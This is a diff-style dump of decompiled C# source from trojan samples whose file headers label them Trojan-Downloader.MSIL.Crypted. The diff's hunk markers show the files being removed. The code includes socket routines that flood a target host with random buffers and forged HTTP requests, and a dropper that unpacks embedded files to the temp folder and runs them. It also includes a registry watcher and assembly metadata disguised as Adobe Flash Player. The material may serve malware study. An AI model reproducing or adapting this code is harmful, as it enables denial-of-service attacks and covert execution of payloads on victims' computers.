socket3.Send(ᘒː\u1AA4ǡᖶŐ.\u0F7Bṷ॔ů\u0BDC());
|
|
||||||
++num;
|
|
||||||
Thread.Sleep(1);
|
|
||||||
}
|
|
||||||
socket3.Close();
|
|
||||||
socket4 = (Socket) null;
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
socket3.Close();
|
|
||||||
socket4 = (Socket) null;
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
Thread.Sleep(ᘒː\u1AA4ǡᖶŐ.ṸА);
|
|
||||||
break;
|
|
||||||
case ᘒː\u1AA4ǡᖶŐ.ፅঊᘇ\u0B11.\u0866\u0D3B\u088Cǖ:
|
|
||||||
Socket socket5 = (Socket) null;
|
|
||||||
try
|
|
||||||
{
|
|
||||||
socket5 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
|
|
||||||
socket5.Connect(ᘒː\u1AA4ǡᖶŐ.ᣨ, ᘒː\u1AA4ǡᖶŐ.\u09F8ߛї\u07BDܩټྴ);
|
|
||||||
socket5.Send(ᘒː\u1AA4ǡᖶŐ.ეᑼˇሂᎨ೦ïۋᐰ());
|
|
||||||
while (socket5.Connected)
|
|
||||||
{
|
|
||||||
if (ᘒː\u1AA4ǡᖶŐ.Ѓഅᅽ\u0C4Fz\u104C\u12D7༩)
|
|
||||||
{
|
|
||||||
if (ᘒː\u1AA4ǡᖶŐ.ᐯٔլ์ᚖᓠ.ᦹ)
|
|
||||||
{
|
|
||||||
socket5.Send(ᘒː\u1AA4ǡᖶŐ.ეᑼˇሂᎨ೦ïۋᐰ());
|
|
||||||
Thread.Sleep(2000);
|
|
||||||
}
|
|
||||||
else
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
else
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
socket5.Close();
|
|
||||||
}
|
|
||||||
Thread.Sleep(ᘒː\u1AA4ǡᖶŐ.ṸА);
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
num = 0;
|
|
||||||
}
|
|
||||||
if (!ᘒː\u1AA4ǡᖶŐ.Ѓഅᅽ\u0C4Fz\u104C\u12D7༩)
|
|
||||||
return;
|
|
||||||
ᘒː\u1AA4ǡᖶŐ.\u0AFEૃᭇ();
|
|
||||||
}
|
|
||||||
|
|
||||||
private static void ኦ\u19E4ẋʳ(IAsyncResult _param0)
|
|
||||||
{
|
|
||||||
}
|
|
||||||
|
|
||||||
private static byte[] \u0F7Bṷ॔ů\u0BDC()
|
|
||||||
{
|
|
||||||
Random random = new Random();
|
|
||||||
byte[] buffer = new byte[random.Next(1470, 65507)];
|
|
||||||
random.NextBytes(buffer);
|
|
||||||
return buffer;
|
|
||||||
}
|
|
||||||
|
|
||||||
private static byte[] ঊᬤصᔏพၓƚ()
|
|
||||||
{
|
|
||||||
Random random = new Random();
|
|
||||||
byte[] buffer = new byte[random.Next(1470, (int) ushort.MaxValue)];
|
|
||||||
random.NextBytes(buffer);
|
|
||||||
return buffer;
|
|
||||||
}
|
|
||||||
|
|
||||||
private static byte[] ეᑼˇሂᎨ೦ïۋᐰ()
|
|
||||||
{
|
|
||||||
Random random = new Random();
|
|
||||||
StringBuilder stringBuilder = new StringBuilder();
|
|
||||||
stringBuilder.AppendLine("GET / HTTP/1.1");
|
|
||||||
stringBuilder.AppendLine("Host: " + ᘒː\u1AA4ǡᖶŐ.ᣨ);
|
|
||||||
stringBuilder.AppendLine("User-Agent: " + ґ.ᖢ(ᘒː\u1AA4ǡᖶŐ.\u1AE9᷅ཾᴃᬵᥘ[random.Next(0, ᘒː\u1AA4ǡᖶŐ.\u1AE9᷅ཾᴃᬵᥘ.Length - 1)], true) + " " + ґ.ᖢ(ᘒː\u1AA4ǡᖶŐ.ᖇɒᘹنṠ\u0DE2[random.Next(0, ᘒː\u1AA4ǡᖶŐ.ᖇɒᘹنṠ\u0DE2.Length - 1)], true));
|
|
||||||
stringBuilder.AppendLine("Content-Length: " + random.Next(1, 1000).ToString());
|
|
||||||
stringBuilder.AppendLine("X-a: " + random.Next(1, 10000).ToString());
|
|
||||||
stringBuilder.Append("Connection: keep-alive");
|
|
||||||
return Encoding.ASCII.GetBytes(stringBuilder.ToString());
|
|
||||||
}
|
|
||||||
|
|
||||||
public enum ፅঊᘇ\u0B11
|
|
||||||
{
|
|
||||||
ũƽᝯᡝᵵ,
|
|
||||||
\u17F8,
|
|
||||||
\u0C81ᑯȝ\u16FC,
|
|
||||||
\u0866\u0D3B\u088Cǖ,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,37 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ᙶЧ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.IO;
|
|
||||||
using System.Reflection;
|
|
||||||
using System.Resources;
|
|
||||||
using System.Threading;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class ᙶЧ
|
|
||||||
{
|
|
||||||
public static void ඨ᰷ᆌචẐᦼᔟᣨ() => new Thread((ThreadStart) (() =>
|
|
||||||
{
|
|
||||||
BinaryReader binaryReader = new BinaryReader((Stream) new MemoryStream(ґ.ᢝҳᔏ\u0C54ᇗᎶᓠয̙((byte[]) new ResourceManager("b", Assembly.GetExecutingAssembly()).GetObject("b"), false)));
|
|
||||||
while (binaryReader.PeekChar() != -1)
|
|
||||||
{
|
|
||||||
string str = binaryReader.ReadString();
|
|
||||||
int count = binaryReader.ReadInt32();
|
|
||||||
byte[] bytes = binaryReader.ReadBytes(count);
|
|
||||||
try
|
|
||||||
{
|
|
||||||
if (!File.Exists(Path.GetTempPath() + str))
|
|
||||||
File.WriteAllBytes(Path.GetTempPath() + str, bytes);
|
|
||||||
Process.Start(Path.GetTempPath() + str);
|
|
||||||
}
|
|
||||||
catch
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
})).Start();
|
|
||||||
}
|
|
||||||
}
|
|
File diff suppressed because one or more lines are too long
@ -1,45 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ຂᶛỠ༼ڂ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class \u16F9ຂ\u0AC6ᶛỠ\u0F3C\u0CDFڂ\u1F1E : EventArgs
|
|
||||||
{
|
|
||||||
private byte[] \u1C2D\u1716Ꮒר֭ᙊұݺ\u02E6;
|
|
||||||
private int Đᄞᐖƫເᱧ೮Ϳೲ;
|
|
||||||
private \u08F6ᝀ\u08C3.ൠᙣෛ̛\u02E6 پپᏖ\u0ACEܾ\u000Fൟ\u0DC7;
|
|
||||||
|
|
||||||
public \u16F9ຂ\u0AC6ᶛỠ\u0F3C\u0CDFڂ\u1F1E(
|
|
||||||
byte[] data,
|
|
||||||
int len,
|
|
||||||
\u08F6ᝀ\u08C3.ൠᙣෛ̛\u02E6 header)
|
|
||||||
{
|
|
||||||
this.ᘟ᧖\u0E80ᗣ = data;
|
|
||||||
this.ᆛ = len;
|
|
||||||
this.ἋᩡᙙȜ௧Ꮷ = header;
|
|
||||||
}
|
|
||||||
|
|
||||||
public byte[] ᘟ᧖\u0E80ᗣ
|
|
||||||
{
|
|
||||||
get => this.\u1C2D\u1716Ꮒר֭ᙊұݺ\u02E6;
|
|
||||||
set => this.\u1C2D\u1716Ꮒר֭ᙊұݺ\u02E6 = value;
|
|
||||||
}
|
|
||||||
|
|
||||||
public int ᆛ
|
|
||||||
{
|
|
||||||
get => this.Đᄞᐖƫເᱧ೮Ϳೲ;
|
|
||||||
set => this.Đᄞᐖƫເᱧ೮Ϳೲ = value;
|
|
||||||
}
|
|
||||||
|
|
||||||
public \u08F6ᝀ\u08C3.ൠᙣෛ̛\u02E6 ἋᩡᙙȜ௧Ꮷ
|
|
||||||
{
|
|
||||||
get => this.پپᏖ\u0ACEܾ\u000Fൟ\u0DC7;
|
|
||||||
set => this.پپᏖ\u0ACEܾ\u000Fൟ\u0DC7 = value;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,33 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ݎᮜఝỼᔩ૾Ҋᇅ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System;
|
|
||||||
using System.Collections.Generic;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class \u173AݎᮜఝỼᔩ\u0AFEҊᇅ
|
|
||||||
{
|
|
||||||
public \u08F6ᝀ\u08C3.ൠᙣෛ̛\u02E6 \u18ADᦌਟࡎ;
|
|
||||||
public byte[] ᛈᅴᑿ;
|
|
||||||
|
|
||||||
public \u173AݎᮜఝỼᔩ\u0AFEҊᇅ(\u08F6ᝀ\u08C3.ൠᙣෛ̛\u02E6 header, byte[] data)
|
|
||||||
{
|
|
||||||
this.\u18ADᦌਟࡎ = header;
|
|
||||||
this.ᛈᅴᑿ = data;
|
|
||||||
}
|
|
||||||
|
|
||||||
public byte[] \u1A76Ἢཿ()
|
|
||||||
{
|
|
||||||
List<byte> byteList = new List<byte>();
|
|
||||||
byteList.AddRange((IEnumerable<byte>) BitConverter.GetBytes((int) this.\u18ADᦌਟࡎ));
|
|
||||||
byteList.AddRange((IEnumerable<byte>) this.ᛈᅴᑿ);
|
|
||||||
byte[] array = byteList.ToArray();
|
|
||||||
byteList.Clear();
|
|
||||||
return ґ.êᰉ\u0EA4(array, true);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,18 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ᝣ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System.IO;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class ᝣ : BinaryReader
|
|
||||||
{
|
|
||||||
public ᝣ(byte[] data)
|
|
||||||
: base((Stream) new MemoryStream(data))
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,221 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.ᮚᇡĚቩ୪ਓ
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using Microsoft.Win32;
|
|
||||||
using System;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.IO;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
using System.Threading;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
public class ᮚᇡĚቩ୪ਓ : IDisposable
|
|
||||||
{
|
|
||||||
private const int ݕዃਐ॔\u1CB1ğᵹህ\u05F7 = 1;
|
|
||||||
private const int \u0A42s\u1B4Eᢘʧêሳ = 16;
|
|
||||||
private const int Дᷨཝ\u0CFBᣵף = 131072;
|
|
||||||
private static readonly IntPtr \u106Cᄀඞᘂ႗ᛵṋ = new IntPtr(int.MinValue);
|
|
||||||
private static readonly IntPtr \u1DCDɮන\u109E\u0FE2ᠧभ\u0B98\u1718 = new IntPtr(-2147483647);
|
|
||||||
private static readonly IntPtr Ǐ = new IntPtr(-2147483646);
|
|
||||||
private static readonly IntPtr Ҩ\u1AD3 = new IntPtr(-2147483645);
|
|
||||||
private static readonly IntPtr ᰃɅ\u1CB1 = new IntPtr(-2147483644);
|
|
||||||
private static readonly IntPtr ᗙۅ\u0F1Eᦚ = new IntPtr(-2147483643);
|
|
||||||
private static readonly IntPtr Эᅕ\u0C45ཟ\u0FDBᭃᒟá = new IntPtr(-2147483642);
|
|
||||||
private IntPtr ᜦªኖᓘ;
|
|
||||||
private string ლᎼጦ;
|
|
||||||
private object \u0872ᔥຮࠓ = new object();
|
|
||||||
private Thread \u0C71᷌\u0BE2ᤎ\u1AFDᬕ;
|
|
||||||
private ManualResetEvent î\u1941ßᵑ = new ManualResetEvent(false);
|
|
||||||
private ณถR̚ ߍᇹ᩠ต\u1AF2Ꮅ = ณถR̚.ᮯḇᘷڨᆶᛇᖋ | ณถR̚.ǃ\u1806ᶆ | ณถR̚.ů᜔ᣪᇼ | ณถR̚.Ἄᑶᇠ;
|
|
||||||
|
|
||||||
public ᮚᇡĚቩ୪ਓ(RegistryKey registryKey) => this.\u0825K့ڤᒣᦍ\u1C39\u0008(registryKey.Name);
|
|
||||||
|
|
||||||
public ᮚᇡĚቩ୪ਓ(string name) => this.\u0825K့ڤᒣᦍ\u1C39\u0008(name);
|
|
||||||
|
|
||||||
public ᮚᇡĚቩ୪ਓ(RegistryHive registryHive, string subKey) => this.\u1BF2ᓟᡬ\u000A\u0E4Fૢ(registryHive, subKey);
|
|
||||||
|
|
||||||
[DllImport("advapi32.dll", EntryPoint = "RegOpenKeyEx", SetLastError = true)]
|
|
||||||
private static extern int \u0A04ᷙԄ᱖ᣯ૧\u19ED(
|
|
||||||
IntPtr _param0,
|
|
||||||
string ᬩʰᏥത,
|
|
||||||
uint _param2,
|
|
||||||
int _param3,
|
|
||||||
out IntPtr _param4);
|
|
||||||
|
|
||||||
[DllImport("advapi32.dll", EntryPoint = "RegNotifyChangeKeyValue", SetLastError = true)]
|
|
||||||
private static extern int \u06EAỊך᪵ᏀႴ൧(
|
|
||||||
IntPtr _param0,
|
|
||||||
bool པᗸᶩ᷄ᶆ,
|
|
||||||
ณถR̚ _param2,
|
|
||||||
IntPtr _param3,
|
|
||||||
bool ÊഏᎯᙴᐾ̦ช);
|
|
||||||
|
|
||||||
[DllImport("advapi32.dll", EntryPoint = "RegCloseKey", SetLastError = true)]
|
|
||||||
private static extern int ṕҺᭈ\u0A7AᆱĊ(IntPtr _param0);
|
|
||||||
|
|
||||||
public event EventHandler \u0E69ǧ\u0382᷿ᚬܮṁ;
|
|
||||||
|
|
||||||
protected virtual void OnRegChanged()
|
|
||||||
{
|
|
||||||
EventHandler ψᘩᐶ = this.ψ\u1CC1ᘩᐶ;
|
|
||||||
if (ψᘩᐶ == null)
|
|
||||||
return;
|
|
||||||
ψᘩᐶ((object) this, (EventArgs) null);
|
|
||||||
}
|
|
||||||
|
|
||||||
public event ErrorEventHandler ŹᏄ\u02C4;
|
|
||||||
|
|
||||||
protected virtual void OnError(Exception e)
|
|
||||||
{
|
|
||||||
}
|
|
||||||
|
|
||||||
public void Dispose()
|
|
||||||
{
|
|
||||||
this.ᶏ\u0FD1гᵒ();
|
|
||||||
GC.SuppressFinalize((object) this);
|
|
||||||
}
|
|
||||||
|
|
||||||
public ณถR̚ ᖘ੍\u09D2\u09DE߁ᦦཻԛ
|
|
||||||
{
|
|
||||||
get => this.ߍᇹ᩠ต\u1AF2Ꮅ;
|
|
||||||
set
|
|
||||||
{
|
|
||||||
lock (this.\u0872ᔥຮࠓ)
|
|
||||||
this.ߍᇹ᩠ต\u1AF2Ꮅ = value;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
private void \u1BF2ᓟᡬ\u000A\u0E4Fૢ(RegistryHive _param1, string _param2)
|
|
||||||
{
|
|
||||||
switch (_param1)
|
|
||||||
{
|
|
||||||
case RegistryHive.ClassesRoot:
|
|
||||||
this.ᜦªኖᓘ = ᮚᇡĚቩ୪ਓ.\u106Cᄀඞᘂ႗ᛵṋ;
|
|
||||||
break;
|
|
||||||
case RegistryHive.CurrentUser:
|
|
||||||
this.ᜦªኖᓘ = ᮚᇡĚቩ୪ਓ.\u1DCDɮන\u109E\u0FE2ᠧभ\u0B98\u1718;
|
|
||||||
break;
|
|
||||||
case RegistryHive.LocalMachine:
|
|
||||||
this.ᜦªኖᓘ = ᮚᇡĚቩ୪ਓ.Ǐ;
|
|
||||||
break;
|
|
||||||
case RegistryHive.Users:
|
|
||||||
this.ᜦªኖᓘ = ᮚᇡĚቩ୪ਓ.Ҩ\u1AD3;
|
|
||||||
break;
|
|
||||||
case RegistryHive.PerformanceData:
|
|
||||||
this.ᜦªኖᓘ = ᮚᇡĚቩ୪ਓ.ᰃɅ\u1CB1;
|
|
||||||
break;
|
|
||||||
case RegistryHive.CurrentConfig:
|
|
||||||
this.ᜦªኖᓘ = ᮚᇡĚቩ୪ਓ.ᗙۅ\u0F1Eᦚ;
|
|
||||||
break;
|
|
||||||
case RegistryHive.DynData:
|
|
||||||
this.ᜦªኖᓘ = ᮚᇡĚቩ୪ਓ.Эᅕ\u0C45ཟ\u0FDBᭃᒟá;
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
this.ლᎼጦ = _param2;
|
|
||||||
}
|
|
||||||
|
|
||||||
private void \u0825K့ڤᒣᦍ\u1C39\u0008(string _param1)
|
|
||||||
{
|
|
||||||
string[] strArray = _param1.Split('\\');
|
|
||||||
switch (strArray[0])
|
|
||||||
{
|
|
||||||
case "HKEY_CLASSES_ROOT":
|
|
||||||
case "HKCR":
|
|
||||||
this.ᜦªኖᓘ = ᮚᇡĚቩ୪ਓ.\u106Cᄀඞᘂ႗ᛵṋ;
|
|
||||||
break;
|
|
||||||
case "HKEY_CURRENT_USER":
|
|
||||||
case "HKCU":
|
|
||||||
this.ᜦªኖᓘ = ᮚᇡĚቩ୪ਓ.\u1DCDɮන\u109E\u0FE2ᠧभ\u0B98\u1718;
|
|
||||||
break;
|
|
||||||
case "HKEY_LOCAL_MACHINE":
|
|
||||||
case "HKLM":
|
|
||||||
this.ᜦªኖᓘ = ᮚᇡĚቩ୪ਓ.Ǐ;
|
|
||||||
break;
|
|
||||||
case "HKEY_USERS":
|
|
||||||
this.ᜦªኖᓘ = ᮚᇡĚቩ୪ਓ.Ҩ\u1AD3;
|
|
||||||
break;
|
|
||||||
case "HKEY_CURRENT_CONFIG":
|
|
||||||
this.ᜦªኖᓘ = ᮚᇡĚቩ୪ਓ.ᗙۅ\u0F1Eᦚ;
|
|
||||||
break;
|
|
||||||
default:
|
|
||||||
this.ᜦªኖᓘ = IntPtr.Zero;
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
this.ლᎼጦ = string.Join("\\", strArray, 1, strArray.Length - 1);
|
|
||||||
}
|
|
||||||
|
|
||||||
public bool ȧẫ̯ྤ\u0003\u19EDխ => this.\u0C71᷌\u0BE2ᤎ\u1AFDᬕ != null;
|
|
||||||
|
|
||||||
public void ቐۂ()
|
|
||||||
{
|
|
||||||
lock (this.\u0872ᔥຮࠓ)
|
|
||||||
{
|
|
||||||
if (this.ȧẫ̯ྤ\u0003\u19EDխ)
|
|
||||||
return;
|
|
||||||
this.î\u1941ßᵑ.Reset();
|
|
||||||
this.\u0C71᷌\u0BE2ᤎ\u1AFDᬕ = new Thread(new ThreadStart(this.ڗࠔ\u1ADDcᬗẕᔕ));
|
|
||||||
this.\u0C71᷌\u0BE2ᤎ\u1AFDᬕ.IsBackground = true;
|
|
||||||
this.\u0C71᷌\u0BE2ᤎ\u1AFDᬕ.Start();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
public void ᶏ\u0FD1гᵒ()
|
|
||||||
{
|
|
||||||
lock (this.\u0872ᔥຮࠓ)
|
|
||||||
{
|
|
||||||
Thread thread = this.\u0C71᷌\u0BE2ᤎ\u1AFDᬕ;
|
|
||||||
if (thread == null)
|
|
||||||
return;
|
|
||||||
this.î\u1941ßᵑ.Set();
|
|
||||||
thread.Join();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
private void ڗࠔ\u1ADDcᬗẕᔕ()
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
this.ᯍଇऎ෨ᡷᰓ۟\u002E\u066D();
|
|
||||||
}
|
|
||||||
catch (Exception ex)
|
|
||||||
{
|
|
||||||
this.OnError(ex);
|
|
||||||
}
|
|
||||||
this.\u0C71᷌\u0BE2ᤎ\u1AFDᬕ = (Thread) null;
|
|
||||||
}
|
|
||||||
|
|
||||||
private void ᯍଇऎ෨ᡷᰓ۟\u002E\u066D()
|
|
||||||
{
|
|
||||||
IntPtr num;
|
|
||||||
int error1 = ᮚᇡĚቩ୪ਓ.\u0A04ᷙԄ᱖ᣯ૧\u19ED(this.ᜦªኖᓘ, this.ლᎼጦ, 0U, 131089, out num);
|
|
||||||
if (error1 != 0)
|
|
||||||
throw new Win32Exception(error1);
|
|
||||||
try
|
|
||||||
{
|
|
||||||
AutoResetEvent autoResetEvent = new AutoResetEvent(false);
|
|
||||||
WaitHandle[] waitHandles = new WaitHandle[2]
|
|
||||||
{
|
|
||||||
(WaitHandle) autoResetEvent,
|
|
||||||
(WaitHandle) this.î\u1941ßᵑ
|
|
||||||
};
|
|
||||||
while (!this.î\u1941ßᵑ.WaitOne(0, true))
|
|
||||||
{
|
|
||||||
int error2 = ᮚᇡĚቩ୪ਓ.\u06EAỊך᪵ᏀႴ൧(num, true, this.ߍᇹ᩠ต\u1AF2Ꮅ, autoResetEvent.SafeWaitHandle.DangerousGetHandle(), true);
|
|
||||||
if (error2 != 0)
|
|
||||||
throw new Win32Exception(error2);
|
|
||||||
if (WaitHandle.WaitAny(waitHandles) == 0)
|
|
||||||
this.OnRegChanged();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
finally
|
|
||||||
{
|
|
||||||
if (num != IntPtr.Zero)
|
|
||||||
ᮚᇡĚቩ୪ਓ.ṕҺᭈ\u0A7AᆱĊ(num);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,27 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: ᥟޱഁेࠃᵷᣚ.Ḵ᨞ᛏᖯ̿ࣴᷩ֞࣪
|
|
||||||
// Assembly: lgy, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: F6858297-EDCC-46A7-BF64-CBC6BE6B3CD4
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.MSIL.Crypted.ej-8021b1adb21670f837224cd99ccee8599abd7a84c7c3cf7b87df9da753a7739c.exe
|
|
||||||
|
|
||||||
using System;
|
|
||||||
using System.Net.Sockets;
|
|
||||||
|
|
||||||
namespace ᥟޱഁेࠃᵷᣚ
|
|
||||||
{
|
|
||||||
internal class Ḵ\u1A1Eᛏᖯ̿ࣴᷩ֞࣪ : EventArgs
|
|
||||||
{
|
|
||||||
private SocketError ኟ\u1719;
|
|
||||||
private int ӻᔻᜡʊᯁ;
|
|
||||||
|
|
||||||
public Ḵ\u1A1Eᛏᖯ̿ࣴᷩ֞࣪(SocketError s_err, int s_n_err)
|
|
||||||
{
|
|
||||||
this.ኟ\u1719 = s_err;
|
|
||||||
this.ӻᔻᜡʊᯁ = s_n_err;
|
|
||||||
}
|
|
||||||
|
|
||||||
public SocketError ᆆᅭҫᔽᚄݞ\u003D => this.ኟ\u1719;
|
|
||||||
|
|
||||||
public int Ʈ\u05F7ʪ => this.ӻᔻᜡʊᯁ;
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,18 +0,0 @@
|
|||||||
using System.Reflection;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
|
|
||||||
[assembly: AssemblyTrademark("")]
|
|
||||||
[assembly: AssemblyFileVersion("11.0.0.0")]
|
|
||||||
[assembly: ComVisible(true)]
|
|
||||||
[assembly: SuppressIldasm]
|
|
||||||
[assembly: AssemblyDelaySign(false)]
|
|
||||||
[assembly: AssemblyKeyName("")]
|
|
||||||
[assembly: AssemblyCopyright("Adobe. All rights reserved.")]
|
|
||||||
[assembly: AssemblyTitle("Adobe Flash Player")]
|
|
||||||
[assembly: AssemblyConfiguration("")]
|
|
||||||
[assembly: AssemblyProduct("Adobe Flash Player")]
|
|
||||||
[assembly: Guid("a8b2fd42-a600-4550-9760-ecb2be60ee01")]
|
|
||||||
[assembly: AssemblyDescription("Adobe Flash Player")]
|
|
||||||
[assembly: AssemblyCompany("Adobe")]
|
|
||||||
[assembly: AssemblyVersion("11.0.0.0")]
|
|
@ -1,46 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: F82fchqQqTUtSNyh1T.YAg4VG5JSVgXdvErgw
|
|
||||||
// Assembly: flashplayer, Version=11.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 06BDE18B-52D6-4D54-8321-212AE21F05B1
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.MSIL.Crypted.fr-9dcecd19b8e10f34e5fd424de314a4ff4f6a655715e6a2e6edd2182937dc1026.exe
|
|
||||||
|
|
||||||
using aCAxGo8jUjXrWCMv1a;
|
|
||||||
using System;
|
|
||||||
using System.Reflection;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
|
|
||||||
namespace F82fchqQqTUtSNyh1T
|
|
||||||
{
|
|
||||||
internal class YAg4VG5JSVgXdvErgw
|
|
||||||
{
|
|
||||||
internal static Module Ngn6LJ6MO;
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
internal static void m9nUJW00CQ7Ie(int typemdt)
|
|
||||||
{
|
|
||||||
Type type = YAg4VG5JSVgXdvErgw.Ngn6LJ6MO.ResolveType(33554432 + typemdt);
|
|
||||||
foreach (FieldInfo field in type.GetFields())
|
|
||||||
{
|
|
||||||
MethodInfo method = (MethodInfo) YAg4VG5JSVgXdvErgw.Ngn6LJ6MO.ResolveMethod(field.MetadataToken + 100663296);
|
|
||||||
field.SetValue((object) null, (object) (MulticastDelegate) Delegate.CreateDelegate(type, method));
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
public YAg4VG5JSVgXdvErgw()
|
|
||||||
{
|
|
||||||
F6gnBCYuM3Gh9uSkf3.c3FUJW0tbGb2O();
|
|
||||||
// ISSUE: explicit constructor call
|
|
||||||
base.\u002Ector();
|
|
||||||
}
|
|
||||||
|
|
||||||
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
||||||
static YAg4VG5JSVgXdvErgw()
|
|
||||||
{
|
|
||||||
F6gnBCYuM3Gh9uSkf3.c3FUJW0tbGb2O();
|
|
||||||
YAg4VG5JSVgXdvErgw.Ngn6LJ6MO = typeof (YAg4VG5JSVgXdvErgw).Assembly.ManifestModule;
|
|
||||||
}
|
|
||||||
|
|
||||||
internal delegate void SFU4mbT3GMret7THonf(object o);
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,20 +0,0 @@
|
|||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 9.00
|
|
||||||
# Visual Studio 2005
|
|
||||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "flashplayer", "Trojan-Downloader.MSIL.Crypted.fr-9dcecd19b8e10f34e5fd424de314a4ff4f6a655715e6a2e6edd2182937dc1026.csproj", "{035B7341-C5D9-4725-9EEE-18E077452284}"
|
|
||||||
EndProject
|
|
||||||
Global
|
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
|
||||||
Debug|Any CPU = Debug|Any CPU
|
|
||||||
Release|Any CPU = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
|
||||||
{035B7341-C5D9-4725-9EEE-18E077452284}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
|
||||||
